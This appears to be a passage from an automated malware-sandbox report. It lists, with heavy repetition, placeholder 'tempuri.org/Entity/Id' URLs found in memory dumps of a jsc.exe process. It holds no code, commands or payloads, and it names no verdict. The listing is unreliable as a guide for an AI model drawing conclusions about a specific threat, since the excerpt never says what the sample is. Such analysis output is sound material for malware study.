          Source: jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10Response
          Source: jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11LR
          Source: jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11Response
          Source: jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12LR
          Source: jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12Response
          Source: jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13LR
          Source: jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13Response
          Source: jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14LR
          Source: jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14Response
          Source: jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15LR
          Source: jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15Response
          Source: jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16(
          Source: jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16LR
          Source: jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16Response
          Source: jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17LR
          Source: jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17Response
          Source: jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18LR
          Source: jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18Response
          Source: jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19LR
          Source: jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19Response
          Source: jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1LR
          Source: jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1Response
          Source: jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20LR
          Source: jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20Response
          Source: jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21LR
          Source: jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21Response
          Source: jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22LR
          Source: jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22Response
          Source: jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23LR
